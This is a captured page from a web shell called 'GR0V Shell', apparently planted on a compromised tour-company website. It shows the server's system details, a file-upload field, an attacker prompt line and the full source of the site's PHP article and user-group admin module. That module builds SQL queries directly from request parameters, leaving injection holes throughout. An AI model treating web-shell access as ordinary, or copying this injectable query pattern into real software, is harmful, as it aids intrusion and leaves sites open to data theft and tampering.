? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/public_html/modules-bak/users/
File Upload :
Current File : /home/admin/public_html/modules-bak/users/mod_article.php

<?
class group extends MySql
{
function add_category($name,$detail){
$numRow=$this->check_data('usertype','usertype_name',$name);
if($numRow==""){
if($name!=""&&$detail!=""){
                      
$result=$this->Query("insert into usertype (usertype_name,usertype_level) values ('$name','$detail')");
if($result){
	$u=$this->getDataOneRow('usertype',$name,'usertype_name');
	$id=$u['usertype_id'];
	if($_POST['checkbox']!=''){
					foreach($_POST['checkbox'] as $k=>$v){
						$this->Query("INSERT INTO modules (module_name,usertype_access_id) value ('$v','$id')");
					}//end foreach
			}
echo"<meta http-equiv=\"refresh\" content=\"0;url=$PHPSELF?mod=user&ac=groups&msg=1\">";
}else{
	$error="ไม่สามารถบันทึกข้อมูลได้ในขณะนี้ค่ะ";
	echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
	exit(0);
}
}else{
	$error="กรอกข้อมูลไม่ครบค่ะ";
	echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
	exit(0);
}//จบ ตรวจสอบว่าข้อมูลครบหรือไม
	}else{
//ข้อมูลมีในฐานข้อมูลหรือป่าว
$error="ชื่อหมวดหมู่ซ้ำกับของเดิม";
	echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
	exit(0);
	}	//จบข้อมูลมีในฐานข้อมูลหรือป่าว

}//end
function edit_category($name,$detail,$cat_id){
	if($this->check_data_edit('usertype','usertype_name',$name,'usertype_id',$cat_id)==''){
	if($name!=""&&$detail!=""){
	$result=$this->Query("UPDATE usertype set usertype_name='$name',usertype_level='$detail' where usertype_id='$cat_id'");
if($result){
	$this->Query("DELETE FROM modules WHERE usertype_access_id='$cat_id'");
	if($_POST['checkbox']!=''){
					foreach($_POST['checkbox'] as $k=>$v){
						$this->Query("INSERT INTO modules (module_name,usertype_access_id) value ('$v','$cat_id')");
					}//end foreach
			}
	echo"<meta http-equiv=\"refresh\" content=\"0;url=$PHPSELF?mod=user&ac=groups&msg=2\">";
}else{
		$error="ไม่สามารถแก้ไขข้อมูลได้";
	echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
	exit(0);
}
}else{
	//else check ข้อมูลครบหรือไม่
		$error="ไม่สามารถแก้ไขข้อมูลได้";
	echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
	exit(0);
}// จบการตรวจสอบข้อมูลว่าครบไหม
	}else{
// จบตรวจสอบว่าชื่อซ้ำกันหรือไม
		$error="ชื่อหมวดหมู่มีในฐานข้อมูลแล้ว";
	echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
	exit(0);
	}// จบตรวจสอบว่าชื่อซ้ำกันหรือไม่
}//end edit_category
function del_cat(){
$cat_id=$_GET['group_id'];

$numrow=$this->check_data('users','user_type',$cat_id);
if($numrow==''){
 $result=$this->Query("DELETE FROM usertype WHERE  usertype_id='$cat_id'");
	if($result){
		$this->Query("DELETE FROM modules WHERE usertype_access_id='$cat_id'");
	echo"<meta http-equiv=\"refresh\" content=\"0;url=$PHPSELF?mod=user&ac=groups&msg=3\">";
}else{
	$error="ไม่สามารถลบข้อมูลได้";
	echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
	exit(0);
}
}else{
$error="ไม่สามารถลบข้อมูลได้ เนื่องจากหมวดหมู่นี้ยังมี Userใช้งาน อยู่ในฐานข้อมูล กรุณาลบ User ก่อนค่ะ";
	echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
	exit(0);
}//จบการตรวจสอบว่ามีข้อมูลหัวข้ออยู่ในฐานข้อมูลหรือไม่
}//end function del_cat
function add_topic(){
	$time=time();
	$addarr=array(
	'topic'=>htmlspecialchars($_POST['name'], ENT_QUOTES),
	'type'=>$_POST['type'],
	'detail'=>$_POST['detail'],
	'timeadd'=>$time
		);
 $chk_count=count($addarr);
 $i=0;
foreach($addarr as $key=>$v){    
	  $i++;
			//$v=addslashes($v);
	if($i==$chk_count){
		$fields.="$key";
		$value.="'$v'";
	}else{
		$value.="'$v',";
	$fields.="$key,";
	}

}//จบ foreach
	$sql="INSERT INTO article (".$fields.") values (".$value.")";
	$this->setQuery($sql);
	$result=$this->QueryReturn();
	if($result){
	echo"<meta http-equiv=\"refresh\" content=\"0;url=$PHPSELF?mod=article&msg=1\">";
}else{
		$error="ไม่สามารถเพิ่มข้อมูลได้";
	echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
	exit(0);
}
}//end function add_produce
function edit_topic($topic_id){
$time=time();
$addarr=array(
	'topic'=>htmlspecialchars($_POST['name'], ENT_QUOTES),
	'type'=>$_POST['type'],
	'detail'=>$_POST['detail'],
	'timeupdate'=>$time,
		);
$result=$this->Update($table='article',$addarr,"where id='$topic_id'");
	if($result==1){
echo"<meta http-equiv=\"refresh\" content=\"0;url=$PHPSELF?mod=article&ac=edit_topic&topic_id=$topic_id&msg=2\">";
}else{
		$error="ไม่สามารถเพิ่มข้อมูลได้";
	echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
	exit(0);
}
}//end function add_produce
function del_topic(){
	$topic_id=$_GET['topic_id'];
$result=$this->Query("DELETE FROM article WHERE  id='$topic_id'");
	if($result==1){
	echo"<meta http-equiv=\"refresh\" content=\"0;url=$PHPSELF?mod=article&msg=3\">";
}else{
		$error="ไม่สามารถลบข้อมูลได้";
	echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
	exit(0);
}
}//end function del_topic


function del_user(){
global $user_login;
$user_id=$_GET['id'];

$chk_admin=$this->getDataOneRow('users',$user_id,'user_id');

if($chk_admin['user_type']==1){
	echo "<SCRIPT>alert('Cannot Delete Administator'); window.history.back(); </SCRIPT>\n";
	exit();
}
if($user_login['Type']==1){
$rs=$this->Query("delete from users where user_id='$user_id'");

if($rs){
	$this->Query("DELETE FROM user_profile WHERE user_id='$user_id'");
	echo"<meta http-equiv=\"refresh\" content=\"0;url=admin.php?mod=user&msg=3\">";
	}else{
	echo"<meta http-equiv=\"refresh\" content=\"0;url=admin.php?mod=user&msg=5\">";
}
}else{
echo"<meta http-equiv=\"refresh\" content=\"0;url=admin.php?mod=user&msg=4\">";
}

}



}//end class

?>

T1KUS90T
  root-grov@210.1.60.28:~$